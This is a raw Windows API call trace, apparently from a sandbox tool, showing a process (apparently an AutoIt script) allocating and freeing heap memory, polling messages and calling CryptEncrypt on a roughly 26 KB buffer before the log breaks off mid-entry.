[0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.477] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.477] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.478] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.478] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.478] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.479] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.479] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.479] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.479] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.479] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.479] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0267.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0267.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.480] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.480] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51d00 [0267.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0267.481] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x6794, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x6798) returned 1 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0267.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0267.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0267.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0267.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0267.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0267.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0267.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0267.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0267.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0267.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0267.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0267.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0267.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0267.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f148d8 | out: hHeap=0x970000) returned 1 [0267.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0267.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0267.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0267.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0267.487] CharLowerBuffW (in: lpsz="byte[26520]", cchLength=0xb | out: lpsz="byte[26520]") returned 0xb [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0267.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0267.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6798) returned 0x2f296f8 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: 